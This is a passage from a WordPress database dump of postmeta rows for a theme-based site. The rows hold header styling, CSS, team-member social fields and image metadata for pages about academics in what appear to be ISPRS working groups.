(11410,2721,'_dt_header_transparent_top_bar_bg_opacity','25'),
(11411,2721,'_dt_header_transparent_bg_color','#000000'),
(11412,2721,'_dt_header_transparent_bg_opacity','50'),
(11413,2721,'_dt_header_disabled_background','normal'),
(11414,2721,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(11415,2721,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(11416,2721,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(11417,2721,'_dt_header_disabled_transparent_bg_color','#000000'),
(11418,2721,'_dt_header_disabled_transparent_bg_opacity','50'),
(11419,2721,'_dt_page_overrides_top_margin',''),
(11420,2721,'_dt_page_overrides_right_margin',''),
(11421,2721,'_dt_page_overrides_bottom_margin',''),
(11422,2721,'_dt_page_overrides_left_margin',''),
(11423,2721,'_dt_mobile_page_padding_top',''),
(11424,2721,'_dt_mobile_page_padding_right',''),
(11425,2721,'_dt_mobile_page_padding_bottom',''),
(11426,2721,'_dt_mobile_page_padding_left',''),
(11427,2721,'_dt_fancy_header_layout_heading',''),
(11428,2721,'_dt_fancy_header_title_aligment','center'),
(11429,2721,'_dt_fancy_header_height','300'),
(11430,2721,'_dt_fancy_header_padding-top','0px'),
(11431,2721,'_dt_fancy_header_padding-bottom','0px'),
(11432,2721,'_dt_fancy_header_breadcrumbs_heading',''),
(11433,2721,'_dt_fancy_header_breadcrumbs','disabled'),
(11434,2721,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11435,2721,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11436,2721,'_dt_fancy_header_title_heading',''),
(11437,2721,'_dt_fancy_header_title_mode','custom'),
(11438,2721,'_dt_fancy_header_title','Kourosh Khoshelham University of Melbourne, Australia (ICWG II/1-b)'),
(11439,2721,'_dt_fancy_header_title_font_size','30'),
(11440,2721,'_dt_fancy_header_title_line_height','36'),
(11441,2721,'_dt_fancy_header_text_transform','none'),
(11442,2721,'_dt_fancy_header_title_color_mode','color'),
(11443,2721,'_dt_fancy_header_title_color','#ffffff'),
(11444,2721,'_dt_fancy_header_subtitle_heading',''),
(11445,2721,'_dt_fancy_header_subtitle',''),
(11446,2721,'_dt_fancy_header_subtitle_font_size','18'),
(11447,2721,'_dt_fancy_header_subtitle_line_height','26'),
(11448,2721,'_dt_fancy_header_subtitle_text_transform','none'),
(11449,2721,'_dt_fancy_header_subtitle_color_mode','color'),
(11450,2721,'_dt_fancy_header_subtitle_color','#ffffff'),
(11451,2721,'_dt_fancy_header_bg_heading',''),
(11452,2721,'_dt_fancy_header_bg_color','#222222'),
(11453,2721,'_dt_fancy_header_bg_image_origin','custom'),
(11454,2721,'_dt_fancy_header_bg_image','a:0:{}'),
(11455,2721,'_dt_fancy_header_bg_repeat','no-repeat'),
(11456,2721,'_dt_fancy_header_bg_position_x','center'),
(11457,2721,'_dt_fancy_header_bg_position_y','center'),
(11458,2721,'_dt_fancy_header_bg_fullscreen','1'),
(11459,2721,'_dt_fancy_header_bg_overlay','0'),
(11460,2721,'_dt_fancy_header_overlay_color','#000'),
(11461,2721,'_dt_fancy_header_bg_overlay_opacity','50'),
(11462,2721,'_dt_fancy_header_scroll_effect','default'),
(11463,2721,'_dt_fancy_header_bg_parallax','0.5'),
(11464,2721,'_dt_fancy_header_responsiveness_heading',''),
(11465,2721,'_dt_fancy_header_responsiveness','enabled'),
(11466,2721,'_dt_fancy_header_responsiveness_switch','778px'),
(11467,2721,'_dt_fancy_header_responsive_height','70'),
(11468,2721,'_dt_fancy_header_responsive_font_size','30'),
(11469,2721,'_dt_fancy_header_responsive_title_line_height','38'),
(11470,2721,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11471,2721,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11472,2721,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11473,2721,'_dt_teammate_options_go_to_single','1'),
(11474,2721,'_dt_teammate_options_position',''),
(11475,2721,'_dt_teammate_options_website',''),
(11476,2721,'_dt_teammate_options_mail',''),
(11477,2721,'_dt_teammate_options_facebook',''),
(11478,2721,'_dt_teammate_options_twitter',''),
(11479,2721,'_dt_teammate_options_dribbble',''),
(11480,2721,'_dt_teammate_options_you-tube',''),
(11481,2721,'_dt_teammate_options_rss',''),
(11482,2721,'_dt_teammate_options_delicious',''),
(11483,2721,'_dt_teammate_options_flickr',''),
(11484,2721,'_dt_teammate_options_lastfm',''),
(11485,2721,'_dt_teammate_options_linkedin',''),
(11486,2721,'_dt_teammate_options_vimeo',''),
(11487,2721,'_dt_teammate_options_tumbler',''),
(11488,2721,'_dt_teammate_options_pinterest',''),
(11489,2721,'_dt_teammate_options_devian',''),
(11490,2721,'_dt_teammate_options_skype',''),
(11491,2721,'_dt_teammate_options_github',''),
(11492,2721,'_dt_teammate_options_instagram',''),
(11493,2721,'_dt_teammate_options_stumbleupon',''),
(11494,2721,'_dt_teammate_options_behance',''),
(11495,2721,'_dt_teammate_options_px-500',''),
(11496,2721,'_dt_teammate_options_tripedvisor',''),
(11497,2721,'_dt_teammate_options_vk',''),
(11498,2721,'_dt_teammate_options_foursquare',''),
(11499,2721,'_dt_teammate_options_xing',''),
(11500,2721,'_dt_teammate_options_weibo',''),
(11501,2721,'_dt_teammate_options_odnoklassniki',''),
(11502,2721,'_dt_teammate_options_research-gate',''),
(11503,2721,'_dt_teammate_options_yelp',''),
(11504,2721,'_dt_teammate_options_blogger',''),
(11505,2721,'_dt_teammate_options_soundcloud',''),
(11506,2721,'_dt_teammate_options_viber',''),
(11507,2721,'_dt_teammate_options_whatsapp',''),
(11508,2721,'_dt_teammate_options_reddit',''),
(11509,2721,'_dt_teammate_options_snapchat',''),
(11510,2721,'_dt_teammate_options_telegram',''),
(11511,2721,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11512,2723,'_edit_lock','1665756366:1'),
(11513,2724,'_wp_attached_file','2022/10/w104-e1665756121831.jpg'),
(11514,2724,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:115;s:6:\"height\";i:133;s:4:\"file\";s:31:\"2022/10/w104-e1665756121831.jpg\";s:8:\"filesize\";i:6580;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11515,2723,'_thumbnail_id','2724'),
(11516,2723,'_edit_last','1'),
(11517,2723,'_dt_sidebar_position','disabled'),
(11518,2723,'_dt_sidebar_widgetarea_id','sidebar_1'),
(11519,2723,'_dt_sidebar_hide_on_mobile','0'),
(11520,2723,'_dt_footer_show','1'),
(11521,2723,'_dt_footer_widgetarea_id','sidebar_2'),
(11522,2723,'_dt_footer_hide_on_mobile','0'),
(11523,2723,'_dt_header_title','fancy'),
(11524,2723,'_dt_header_background','normal'),
(11525,2723,'_dt_header_background_below_slideshow','disabled'),
(11526,2723,'_dt_header_transparent_bg_color_scheme','light'),
(11527,2723,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(11528,2723,'_dt_header_transparent_top_bar_bg_opacity','25'),
(11529,2723,'_dt_header_transparent_bg_color','#000000'),
(11530,2723,'_dt_header_transparent_bg_opacity','50'),
(11531,2723,'_dt_header_disabled_background','normal'),
(11532,2723,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(11533,2723,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(11534,2723,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(11535,2723,'_dt_header_disabled_transparent_bg_color','#000000'),
(11536,2723,'_dt_header_disabled_transparent_bg_opacity','50'),
(11537,2723,'_dt_page_overrides_top_margin',''),
(11538,2723,'_dt_page_overrides_right_margin',''),
(11539,2723,'_dt_page_overrides_bottom_margin',''),
(11540,2723,'_dt_page_overrides_left_margin',''),
(11541,2723,'_dt_mobile_page_padding_top',''),
(11542,2723,'_dt_mobile_page_padding_right',''),
(11543,2723,'_dt_mobile_page_padding_bottom',''),
(11544,2723,'_dt_mobile_page_padding_left',''),
(11545,2723,'_dt_fancy_header_layout_heading',''),
(11546,2723,'_dt_fancy_header_title_aligment','center'),
(11547,2723,'_dt_fancy_header_height','300'),
(11548,2723,'_dt_fancy_header_padding-top','0px'),
(11549,2723,'_dt_fancy_header_padding-bottom','0px'),
(11550,2723,'_dt_fancy_header_breadcrumbs_heading',''),
(11551,2723,'_dt_fancy_header_breadcrumbs','disabled'),
(11552,2723,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11553,2723,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11554,2723,'_dt_fancy_header_title_heading',''),
(11555,2723,'_dt_fancy_header_title_mode','custom'),
(11556,2723,'_dt_fancy_header_title','Jónatas Valença University of Lisbon, Portugal (ICWG II/1-b)'),
(11557,2723,'_dt_fancy_header_title_font_size','30'),
(11558,2723,'_dt_fancy_header_title_line_height','36'),
(11559,2723,'_dt_fancy_header_text_transform','none'),
(11560,2723,'_dt_fancy_header_title_color_mode','color'),
(11561,2723,'_dt_fancy_header_title_color','#ffffff'),
(11562,2723,'_dt_fancy_header_subtitle_heading',''),
(11563,2723,'_dt_fancy_header_subtitle',''),
(11564,2723,'_dt_fancy_header_subtitle_font_size','18'),
(11565,2723,'_dt_fancy_header_subtitle_line_height','26'),
(11566,2723,'_dt_fancy_header_subtitle_text_transform','none'),
(11567,2723,'_dt_fancy_header_subtitle_color_mode','color'),
(11568,2723,'_dt_fancy_header_subtitle_color','#ffffff'),
(11569,2723,'_dt_fancy_header_bg_heading',''),
(11570,2723,'_dt_fancy_header_bg_color','#222222'),
(11571,2723,'_dt_fancy_header_bg_image_origin','custom'),
(11572,2723,'_dt_fancy_header_bg_image','a:0:{}'),
(11573,2723,'_dt_fancy_header_bg_repeat','no-repeat'),
(11574,2723,'_dt_fancy_header_bg_position_x','center'),
(11575,2723,'_dt_fancy_header_bg_position_y','center'),
(11576,2723,'_dt_fancy_header_bg_fullscreen','1'),
(11577,2723,'_dt_fancy_header_bg_overlay','0'),
(11578,2723,'_dt_fancy_header_overlay_color','#000'),
(11579,2723,'_dt_fancy_header_bg_overlay_opacity','50'),
(11580,2723,'_dt_fancy_header_scroll_effect','default'),
(11581,2723,'_dt_fancy_header_bg_parallax','0.5'),
(11582,2723,'_dt_fancy_header_responsiveness_heading',''),
(11583,2723,'_dt_fancy_header_responsiveness','enabled'),
(11584,2723,'_dt_fancy_header_responsiveness_switch','778px'),
(11585,2723,'_dt_fancy_header_responsive_height','70'),
(11586,2723,'_dt_fancy_header_responsive_font_size','30'),
(11587,2723,'_dt_fancy_header_responsive_title_line_height','38'),
(11588,2723,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11589,2723,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11590,2723,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11591,2723,'_dt_teammate_options_go_to_single','1'),
(11592,2723,'_dt_teammate_options_position',''),
(11593,2723,'_dt_teammate_options_website',''),
(11594,2723,'_dt_teammate_options_mail',''),
(11595,2723,'_dt_teammate_options_facebook',''),
(11596,2723,'_dt_teammate_options_twitter',''),
(11597,2723,'_dt_teammate_options_dribbble',''),
(11598,2723,'_dt_teammate_options_you-tube',''),
(11599,2723,'_dt_teammate_options_rss',''),
(11600,2723,'_dt_teammate_options_delicious',''),
(11601,2723,'_dt_teammate_options_flickr',''),
(11602,2723,'_dt_teammate_options_lastfm',''),
(11603,2723,'_dt_teammate_options_linkedin',''),
(11604,2723,'_dt_teammate_options_vimeo',''),
(11605,2723,'_dt_teammate_options_tumbler',''),
(11606,2723,'_dt_teammate_options_pinterest',''),
(11607,2723,'_dt_teammate_options_devian',''),
(11608,2723,'_dt_teammate_options_skype',''),
(11609,2723,'_dt_teammate_options_github',''),
(11610,2723,'_dt_teammate_options_instagram',''),
(11611,2723,'_dt_teammate_options_stumbleupon',''),
(11612,2723,'_dt_teammate_options_behance',''),
(11613,2723,'_dt_teammate_options_px-500',''),
(11614,2723,'_dt_teammate_options_tripedvisor',''),
(11615,2723,'_dt_teammate_options_vk',''),
(11616,2723,'_dt_teammate_options_foursquare',''),
(11617,2723,'_dt_teammate_options_xing',''),
(11618,2723,'_dt_teammate_options_weibo',''),
(11619,2723,'_dt_teammate_options_odnoklassniki',''),
(11620,2723,'_dt_teammate_options_research-gate',''),
(11621,2723,'_dt_teammate_options_yelp',''),
(11622,2723,'_dt_teammate_options_blogger',''),
(11623,2723,'_dt_teammate_options_soundcloud',''),
(11624,2723,'_dt_teammate_options_viber',''),
(11625,2723,'_dt_teammate_options_whatsapp',''),
(11626,2723,'_dt_teammate_options_reddit',''),
(11627,2723,'_dt_teammate_options_snapchat',''),
(11628,2723,'_dt_teammate_options_telegram',''),
(11629,2723,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11630,2725,'_wp_attached_file','2022/10/w1m.jpg'),
(11631,2725,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:448;s:6:\"height\";i:364;s:4:\"file\";s:15:\"2022/10/w1m.jpg\";s:8:\"filesize\";i:45781;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"w1m-300x244.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14068;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"w1m-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6532;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11632,2726,'_wp_attached_file','2022/10/w1m2.jpg'),
(11633,2726,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:479;s:6:\"height\";i:374;s:4:\"file\";s:16:\"2022/10/w1m2.jpg\";s:8:\"filesize\";i:69218;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"w1m2-300x234.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:234;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18077;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w1m2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7476;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11634,2712,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:1:{s:10:\"shortcodes\";a:1:{s:48:\"1675605216108-156a50b7fb7c5ad86ecaddcdf8351fa4-3\";a:3:{s:3:\"tag\";s:21:\"vc_masonry_media_grid\";s:4:\"atts\";a:2:{s:7:\"grid_id\";s:55:\"vc_gid:1675605216108-156a50b7fb7c5ad86ecaddcdf8351fa4-3\";s:7:\"include\";s:9:\"2725,2726\";}s:7:\"content\";s:0:\"\";}}}}'),
(11635,2723,'rs_page_bg_color',''),
(11636,2721,'rs_page_bg_color',''),
(11637,2719,'rs_page_bg_color',''),
(11638,2717,'rs_page_bg_color',''),
(11639,2586,'_wp_page_template','default'),
(11640,2586,'_dt_microsite_primary_menu',''),
(11641,2586,'_dt_microsite_split_left_menu',''),
(11642,2586,'_dt_microsite_split_right_menu',''),
(11643,2586,'_dt_microsite_mobile_menu',''),
(11644,2572,'_wp_page_template','default'),
(11645,2572,'_dt_microsite_primary_menu',''),
(11646,2572,'_dt_microsite_split_left_menu',''),
(11647,2572,'_dt_microsite_split_right_menu',''),
(11648,2572,'_dt_microsite_mobile_menu',''),
(11679,2495,'_dt_fancy_header_layout_heading',''),
(11680,2495,'_dt_fancy_header_title_aligment','center'),
(11681,2495,'_dt_fancy_header_height','300'),
(11682,2495,'_dt_fancy_header_padding-top','0px'),
(11683,2495,'_dt_fancy_header_padding-bottom','0px'),
(11684,2495,'_dt_fancy_header_breadcrumbs_heading',''),
(11685,2495,'_dt_fancy_header_breadcrumbs','disabled'),
(11686,2495,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11687,2495,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11688,2495,'_dt_fancy_header_title_heading',''),
(11689,2495,'_dt_fancy_header_title_mode','custom'),
(11690,2495,'_dt_fancy_header_title','Prof. Songnian Li, Ryerson University, Canada'),
(11691,2495,'_dt_fancy_header_title_font_size','30'),
(11692,2495,'_dt_fancy_header_title_line_height','36'),
(11693,2495,'_dt_fancy_header_text_transform','none'),
(11694,2495,'_dt_fancy_header_title_color_mode','color'),
(11695,2495,'_dt_fancy_header_title_color','#ffffff'),
(11696,2495,'_dt_fancy_header_subtitle_heading',''),
(11697,2495,'_dt_fancy_header_subtitle','(WG IV/7)'),
(11698,2495,'_dt_fancy_header_subtitle_font_size','18'),
(11699,2495,'_dt_fancy_header_subtitle_line_height','26'),
(11700,2495,'_dt_fancy_header_subtitle_text_transform','none'),
(11701,2495,'_dt_fancy_header_subtitle_color_mode','color'),
(11702,2495,'_dt_fancy_header_subtitle_color','#ffffff'),
(11703,2495,'_dt_fancy_header_bg_heading',''),
(11704,2495,'_dt_fancy_header_bg_color','#222222'),
(11705,2495,'_dt_fancy_header_bg_image_origin','custom'),
(11706,2495,'_dt_fancy_header_bg_image','a:0:{}'),
(11707,2495,'_dt_fancy_header_bg_repeat','no-repeat'),
(11708,2495,'_dt_fancy_header_bg_position_x','center'),
(11709,2495,'_dt_fancy_header_bg_position_y','center'),
(11710,2495,'_dt_fancy_header_bg_fullscreen','1'),
(11711,2495,'_dt_fancy_header_bg_overlay','0'),
(11712,2495,'_dt_fancy_header_overlay_color','#000'),
(11713,2495,'_dt_fancy_header_bg_overlay_opacity','50'),
(11714,2495,'_dt_fancy_header_scroll_effect','default'),
(11715,2495,'_dt_fancy_header_bg_parallax','0.5'),
(11716,2495,'_dt_fancy_header_responsiveness_heading',''),
(11717,2495,'_dt_fancy_header_responsiveness','enabled'),
(11718,2495,'_dt_fancy_header_responsiveness_switch','778px'),
(11719,2495,'_dt_fancy_header_responsive_height','70'),
(11720,2495,'_dt_fancy_header_responsive_font_size','30'),
(11721,2495,'_dt_fancy_header_responsive_title_line_height','38'),
(11722,2495,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11723,2495,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11724,2495,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11725,2495,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11726,2498,'_dt_fancy_header_layout_heading',''),
(11727,2498,'_dt_fancy_header_title_aligment','center'),
(11728,2498,'_dt_fancy_header_height','300'),
(11729,2498,'_dt_fancy_header_padding-top','0px'),
(11730,2498,'_dt_fancy_header_padding-bottom','0px'),
(11731,2498,'_dt_fancy_header_breadcrumbs_heading',''),
(11732,2498,'_dt_fancy_header_breadcrumbs','disabled'),
(11733,2498,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11734,2498,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11735,2498,'_dt_fancy_header_title_heading',''),
(11736,2498,'_dt_fancy_header_title_mode','custom'),
(11737,2498,'_dt_fancy_header_title','Prof. Maria Antonia Brovelli, Politecnico di Milano, Italy'),
(11738,2498,'_dt_fancy_header_title_font_size','30'),
(11739,2498,'_dt_fancy_header_title_line_height','36'),
(11740,2498,'_dt_fancy_header_text_transform','none'),
(11741,2498,'_dt_fancy_header_title_color_mode','color'),
(11742,2498,'_dt_fancy_header_title_color','#ffffff'),
(11743,2498,'_dt_fancy_header_subtitle_heading',''),
(11744,2498,'_dt_fancy_header_subtitle',''),
(11745,2498,'_dt_fancy_header_subtitle_font_size','18'),
(11746,2498,'_dt_fancy_header_subtitle_line_height','26'),
(11747,2498,'_dt_fancy_header_subtitle_text_transform','none'),
(11748,2498,'_dt_fancy_header_subtitle_color_mode','color'),
(11749,2498,'_dt_fancy_header_subtitle_color','#ffffff'),
(11750,2498,'_dt_fancy_header_bg_heading',''),
(11751,2498,'_dt_fancy_header_bg_color','#222222'),
(11752,2498,'_dt_fancy_header_bg_image_origin','custom'),
(11753,2498,'_dt_fancy_header_bg_image','a:0:{}'),
(11754,2498,'_dt_fancy_header_bg_repeat','no-repeat'),
(11755,2498,'_dt_fancy_header_bg_position_x','center'),
(11756,2498,'_dt_fancy_header_bg_position_y','center'),
(11757,2498,'_dt_fancy_header_bg_fullscreen','1'),
(11758,2498,'_dt_fancy_header_bg_overlay','0'),
(11759,2498,'_dt_fancy_header_overlay_color','#000'),
(11760,2498,'_dt_fancy_header_bg_overlay_opacity','50'),
(11761,2498,'_dt_fancy_header_scroll_effect','default'),
(11762,2498,'_dt_fancy_header_bg_parallax','0.5'),
(11763,2498,'_dt_fancy_header_responsiveness_heading',''),
(11764,2498,'_dt_fancy_header_responsiveness','enabled'),
(11765,2498,'_dt_fancy_header_responsiveness_switch','778px'),
(11766,2498,'_dt_fancy_header_responsive_height','70'),
(11767,2498,'_dt_fancy_header_responsive_font_size','30'),
(11768,2498,'_dt_fancy_header_responsive_title_line_height','38'),
(11769,2498,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11770,2498,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11771,2498,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11772,2498,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right 